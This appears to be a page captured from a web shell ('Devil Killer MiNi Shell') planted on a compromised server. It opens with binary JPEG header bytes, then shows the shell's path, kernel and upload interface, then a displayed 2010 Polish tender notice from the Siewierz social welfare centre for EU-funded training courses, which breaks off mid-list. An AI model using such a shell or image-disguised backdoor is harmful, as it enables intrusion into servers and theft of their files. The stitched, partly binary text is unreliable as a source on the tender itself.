JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100513/122373-N-2010.html

<p class="kh_header"><b>Siewierz: Organizacja i przeprowadzenie szkoleń w ramach projektu systemowego Aktywność to szansa na przyszłość realizowanego przez Ośrodek Pomocy Społecznej w Siewierzu</b><br>
<b>Numer ogłoszenia: 122373 - 2010; data zamieszczenia: 13.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Siewierzu , ul. Żwirki i Wigury 16, 42-470 Siewierz, woj. śląskie, tel. 32 6499493, faks 32 6499493.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń w ramach projektu systemowego Aktywność to szansa na przyszłość realizowanego przez Ośrodek Pomocy Społecznej w Siewierzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje organizację i przeprowadzenie szkoleń w ramach projektu systemowego Aktywność to szansa na przyszłośćrealizowanego przez Ośrodek Pomocy Społecznej w Siewierzu. Projekt Aktywność to szansa na przyszłość otrzymał dofinansowanie z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007 - 2013 w ramach Priorytetu VII. Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
Zamawiający dopuszcza składanie ofert częściowych zgodnie z art.83 ust.2 ustawy Prawo zamówień publicznych na następujące części zamówienia:
Część I. Organizacja  i przeprowadzenie treningu umiejętności psycho-społecznych oraz wizażu i stylizacji własnego wizerunku. Przedmiot zamówienia obejmuje:
1)	trening umiejętności psycho-społecznych obejmujący:
a)	Spotkania z psychologiem 
b)	Indywidualne spotkania z Liderem Klubu Integracji Społecznej
c)	Animacja lokalna 
2)	trening wizażu i stylizacji własnego wizerunku obejmujący: spotkania z wizażystą oraz edukatorem prozdrowotnym
Część II. Organizacja i  przeprowadzenie kursów zawodowych, które mają na celu podniesienie, zmianę lub zaktualizowanie kompetencji zawodowych:
1.	Kurs zawodowy: Florystyka/ Bukieciarstwo  112 godzin po  45 minut / 1 osoba
2. Kurs zawodowy: Organizacja i obsługa gastronomiczna imprez  okolicznościowych  100 godzin po  45 minut/ 7 osobowa  grupa
3. Kurs  zawodowy Palacz C.O   42 godzin / 1 osoba  
4. Kurs  zawodowy: Kierowca wózków jezdniowych z napędem silnikowym 67godzin po 45 minut / 2 osoby  
5. Kurs  zawodowy: Obsługa komputera, kas fiskalnych, urządzeń sklepowych       30 godzin po 45 minut / 4  osobowa  grupa
6. Kurs  zawodowy: Kurs budowlany - technolog wykończenia wnętrz 80 godzin po 45 minut/ 2 osoby  
7. Kurs  zawodowy: Dozór SEP bez ograniczenia napięcia  z  pomiarami 60 godzin po 45 minut/ 1 osoba  
Pozostałe warunki zlecenia wspólne dla części I i II:
a)Zapewnienie opieki nad dziećmi w trakcie realizacji zadań objętych I i II częścią zamówienia.
b)Zwrotu kosztów dojazdu dla uczestnika  szkoleń, treningów,
c)Wykonawca zobowiązany będzie wykonać przedmiot zamówienia zgodnie z wytycznymi Zamawiającego. Zamawiający zastrzega sobie prawo wglądu do dokumentów Wykonawcy związanych z realizacją niniejszych zadań, w tym do dokumentów finansowych oraz prawo kontroli sposobu prowadzenia zajęć  objętych przedmiotem zamówienia. 
d)Warunki płatności:  przelewem w terminie 30 dni od daty  wpływu  faktury VAT do Zamawiającego i stwierdzeniu jej prawidłowości przez Zamawiającego na rachunek wskazany przez Wykonawcę. 
e)O miejscu prowadzenia zajęć Wykonawca poinformuje Zamawiającego na 7 dni przed ich rozpoczęciem. 
f)W celu realizacji szkoleń, treningów Wykonawca zapewni wszelki niezbędny sprzęt oraz materiały niezbędne dla realizacji programu. 
g)Wykonawca zapewni: właściwe warunki bezpieczeństwa i higieny pracy i ppoż przeprowadzenie zajęć (szkoleń, treningów) przez osoby  posiadających kwalifikacje i uprawnienia zgodne z programem oraz  odpowiednie warunki lokalowe.
h)Wykonawca ubezpieczy uczestników szkolenia od następstw nieszczęśliwych wypadków i dostarczy Zamawiającemu kserokopię zawartej polisy ubezpieczeniowej
i)Dane pomocnicze do wykorzystania przez Wykonawcę: wniosek o dofinansowanie do wglądu w siedzibie tutejszego OPS ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.57.00.00-0, 85.31.23.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 03.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków określonych przepisami art. 22 ust. 1 pkt.1-4 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków określonych przepisami art. 22 ust. 1 pkt.1-4 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków określonych przepisami art. 22 ust. 1 pkt.1-4 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków określonych przepisami art. 22 ust. 1 pkt.1-4 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków określonych przepisami art. 22 ust. 1 pkt.1-4 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz oferty wg zał. Nr 1.
2.Pełnomocnictwo do reprezentowania w postępowaniu, jeżeli oferta będzie podpisana przez osobę (y) upoważnioną(e) lub w przypadku występowania podmiotów wspólnie w trybie art.23 ustawy Prawo zamówień publicznych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania zmian                   w umowie w następującym zakresie: zmiana terminu realizacji zamówienia z przyczyn niezależnych od Zamawiającego jak również Wykonawcy np. z powodu nagłej i znacznej ilości rezygnacji przez uczestników szkolenia, wynagrodzenia w przypadku zmniejszenia ilości usług przez Zamawiającego bez zapłaty dodatkowych kwot oraz jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.
 Warunki dokonywania zmian postanowień umowy: 1) inicjowanie zmian na wniosek Wykonawcy lub Zamawiającego, 2) forma pisemna pod rygorem nieważności w formie aneksu do umów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.siewierz.bip.info.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Siewierzu
ul. Żwirki i Wigury 16, 42-470 Siewierz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2010 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej w Siewierzu
ul. Żwirki i Wigury 16, 42-470 Siewierz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Aktywność to szansa na przyszłość otrzymał dofinansowanie z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007 - 2013 w ramach Priorytetu VII. Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
Zamawiający nie przewiduje: przeprowadzenia aukcji elektronicznej, ustanowienia dynamicznego systemu zakupów, zaliczek na poczet wykonania zamówienia, zwrotu kosztów  udziału w postępowaniu,  zawarcia umowy ramowej oraz nie przewiduje ograniczeń ubiegania się o zamówienie publiczne  wynikających z  art. 29 ust. 4 ustawy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja  i przeprowadzenie treningu umiejętności psycho-społecznych oraz wizażu i stylizacji własnego wizerunku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje                          w szczególności:
1)	trening umiejętności psycho-społecznych w ramach którego  należy przeprowadzić spotkania z psychologiem, Liderem Klubu Integracji Społecznej oraz animatorem lokalnym. Termin realizacji - do dnia 3.XII. 2010 r.
a)	Spotkania z psychologiem odbywać się będą w 18 osobowej grupie, łącznie 30 godzin- 45 minutowych  spotkań przez okres 3 miesięcy. Wsparcie psychologiczne pozwoli zniwelować bariery psychiczne występujące u osób bezrobotnych. Treningi mają na celu zwiększyć kompetencje związane z lepszą organizacją czasu, organizacją życia rodzinnego, łączeniem pełnionych ról społecznych i niwelowaniem trudności psychospołecznych, pogłębienie więzi i kontaktów międzyludzkich, poprawę relacji z drugim człowiekiem oraz przezwyciężenie barier komunikacyjnych. Wykonawca zapewni catering obiadowy i kawowy.
b)	Indywidualne spotkania z Liderem Klubu Integracji Społecznej. Celem spotkań będzie nauczenie uczestników swobodnego poruszania się po rynku pracy oraz sporządzania dokumentów aplikacyjnych. Lider KIS będzie pełnił 6 godzin zegarowych  dyżuru w miesiącu przez okres 3 miesięcy (łącznie 18 godzin zegarowych) w ramach, których będzie udostępniał uczestnikom aktualne oferty pracy. Przekaże również wiedzę nt. zakładów pracy w regionie oraz powstających firm i możliwości podjęcia zatrudnienia. Spotkania pozwolą na poznanie mocnych i słabych stron Uczestników, wskażą kierunki poszukiwań zatrudnienia oraz pomogą w wyborze kursów zawodowych zorganizowanych w ramach projektu. 
c)	Animacja lokalna obejmująca łącznie 40 godzin  zegarowych przez okres 4 miesięcy, polegająca na nawiązaniu bezpośredniego kontaktu z grupą uczestników projektu, zaangażowaniu ich w życie kulturalne społeczności lokalnej. Zorganizowanie wyjazdów podczas, których uczestnicy poznają wartościowe sposoby spędzania czasu wolnego. Wykonawca zapewni catering obiadowy i kawowy 
2)	trening wizażu i stylizacji własnego wizerunku, który pozwoli Uczestnikom nabyć umiejętności autoprezentacji i dbania o własny wygląd zewnętrzny. Termin realizacji - VIII 2010 r. W ramach tego treningu Uczestnicy będą mogli skorzystać z indywidualnych porad i usług wizażysty w wymiarze 2 godzin zegarowych na każdego uczestnika oraz z porad edukatora prozdrowotnego (spotkanie w 18 osobowej grupie w wymiarze 2 godzin po 45 minut każda), który przeprowadzi edukację nastawioną na zadbanie o zdrowie i higienę. Rola edukatora jest niezwykle istotna, gdyż pomaga w zmianie wizerunku i nawyków zdrowotnych osób starających się o pracę, co zwiększa ich szansę na jej zdobycie. 
3)	Wykonawca winien  zapewnić również: 
a)	dostarczenie programów oraz harmonogramów treningów
b)	materiały dydaktyczne ( w tym dodatkowy egzemplarz do dokumentacji projektowej),
c)	ubezpieczenie uczestników od następstw  nieszczęśliwych wypadków  na okres trwania treningów
d)	zwrotu kosztów dojazdu dla uczestników treningów
e)	przeprowadzenia  ankiet ewaluacyjnych : na rozpoczęcie każdego z treningów oraz po ich zakończeniu
f)	na podstawie przeprowadzonych badań przygotowanie raportu ewaluacyjnego
g)	wydanie zaświadczeń  o ukończeniu treningów,
h)	zaświadczenia certyfikaty, materiały  dydaktyczne/szkoleniowe, program szkolenia - powinny być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 -2013
i)	zajęcia w ramach treningów realizują Wykonawcy, posiadający odpowiednie kwalifikacje zawodowe w danej dziedzinie.
j)	 Wykonawca będzie prowadził dokumentację treningu, tj. imienne listy obecności  z każdego dnia szkolenia, imienne listy potwierdzające odbiór cateringu obiadowego, imienne listy odbioru materiałów dydaktycznych / szkoleniowych, dzienniki zajęć. Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów.
k)	W przypadku rezygnacji któregoś z uczestników z udziału w projekcie Wykonawca zapewni możliwość udziału w treningu  osoby  przystępującej do projektu oraz zapewni możliwość uzupełnienia zaległości wynikających z wcześniejszych zajęć przeprowadzonych w ramach treningu.
l)	Opłacenie biletów wstępu  oraz pokrycia kosztów przejazdu niezbędnych do prawidłowej realizacji zajęć z animacji lokalnej.
m)	Wykonawca zobowiązuje się do zarejestrowania usługi szkoleniowej na stronie internetowej: www. inwestycja w kadry.pl
n)	Po zrealizowaniu zaplanowanego wsparcia i nabycia przez Uczestników niezbędnych umiejętności wymaganych przez potencjalnych pracodawców należy przeprowadzić spotkanie z pracodawcą i  próbną rozmowę kwalifikacyjną co pozwoli Uczestnikom na zaprezentowanie własnej osoby oraz na przełamanie lęku i stresu związanego  z komunikowaniem się..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.31.23.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja i  przeprowadzenie kursów zawodowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kurs zawodowy: FlorystykaBukieciarstwo 112 godzin po  45 minut / 1 osoba
1)Realizacja  kursu Florystyka Bukieciarstwo dla 1 osoby odbywać się będzie  w okresie od VIII - X 2010 r.
2)Ilość godzin szkolenia  - 112  godzin zajęć obejmujących część teoretyczną oraz praktyczną.
3)Zajęcia powinny się odbywać nie częściej niż 2 razy w tygodniu.
4)Wykonawca zapewnia: 
-   program oraz harmonogram kursu w formie pisemnej
- materiały dydaktyczne ( w tym dodatkowy egzemplarz do dokumentacji projektowej), 
- przeprowadzenia badań niezbędnych do realizacji kursu
- przeprowadzenie egzaminu
- ubezpieczenie uczestnika od następstw  nieszczęśliwych wypadków  na okres trwania kursu
- zwrotu kosztów dojazdu dla uczestnika kursu
- przeprowadzenia  ankiet ewaluacyjnych : na rozpoczęcie kursu oraz po jego zakończeniu
- na podstawie przeprowadzonych badań przygotowanie raportu ewaluacyjnego
-  wydanie zaświadczeń  o ukończeniu szkolenia,
5)Zaświadczenia certyfikaty, materiały  dydaktyczne/szkoleniowe, program szkolenia - powinny być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 -2013
6)Wykonawca zapewnia także: catering obiadowy i kawowy 
7)Zajęcia w ramach kursu realizują nauczyciele/instruktorzy Wykonawcy, posiadający odpowiednie kwalifikacje zawodowe.
8)Wykonawca będzie prowadził dokumentację kursu, tj. imienne listy obecności  z każdego dnia szkolenia, imienne listy potwierdzające odbiór cateringu obiadowego, imienne listy odbioru materiałów dydaktycznych / szkoleniowych, dzienniki zajęć, protokoły z egzaminów. Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów.
9)W przypadku rezygnacji któregoś z uczestników z udziału w projekcie Wykonawca zapewni możliwość udziału w kursie  osoby  przystępującej do projektu oraz zapewni możliwość uzupełnienia zaległości wynikających z wcześniejszych zajęć przeprowadzonych w ramach kursu.
10)Wykonawca zobowiązuje się do zarejestrowania usługi szkoleniowej na stronie internetowej: www. inwestycja w kadry.pl
2. Kurs zawodowy: Organizacja i obsługa gastronomiczna imprez  okolicznościowych100 godzin po  45 minut/ 7 osobowa  grupa
1)Realizacja  kursu Organizacja i obsługa gastronomiczna imprez  okolicznościowych  dla 7 osób odbywać się będzie w okresie od VIII - X 2010 r.
2)Ilość godzin szkolenia  -  100 godzin zajęć obejmujących część teoretyczną oraz praktyczną.
3)Zajęcia powinny się odbywać nie częściej niż 2 razy w tygodniu.
4)Wykonawca zapewnia: 
- dostarczyć program oraz harmonogram kursu
- materiały dydaktyczne ( w tym dodatkowy egzemplarz do dokumentacji projektowej), 
- przeprowadzenia badań niezbędnych do realizacji kursu
- przeprowadzenie egzaminu
- ubezpieczenie uczestników od następstw  nieszczęśliwych wypadków  na okres trwania kursu
- zwrotu kosztów dojazdu dla uczestników kursu
- przeprowadzenia  ankiet ewaluacyjnych : na rozpoczęcie kursu oraz po jego zakończeniu
- na podstawie przeprowadzonych badań przygotowanie raportu ewaluacyjnego
-  wydanie zaświadczeń  o ukończeniu kursu,
5)Zaświadczenia certyfikaty, materiały  dydaktyczne/szkoleniowe, program szkolenia - powinny być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 -2013
6)Wykonawca zapewnia także: catering obiadowy i kawowy 
7)Zajęcia w ramach kursu realizują nauczyciele/instruktorzy Wykonawcy, posiadający odpowiednie kwalifikacje zawodowe.
8)Wykonawca zobowiązuje się do prowadzenia dokumentacji kursu tj. imienne listy obecności  z każdego dnia szkolenia, imienne listy potwierdzające odbiór cateringu obiadowego, imienne listy odbioru materiałów dydaktycznych / szkoleniowych, dzienniki zajęć, protokoły z egzaminów. Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów.
9)W przypadku rezygnacji któregoś z uczestników z udziału w projekcie Wykonawca zapewni możliwość udziału w kursie  osoby  przystępującej do projektu oraz zapewni możliwość uzupełnienia zaległości wynikających z wcześniejszych zajęć przeprowadzonych w ramach kursu.
10)Wykonawca zobowiązuje się do zarejestrowania usługi szkoleniowej na stronie internetowej: www. inwestycja w kadry.pl
3. Kurs  zawodowy Palacz C.O   42 godzin  1 osoba  
1). Realizacja  kursu  Palacz C.O  dla 1 osoby  odbywać się będzie w okresie 
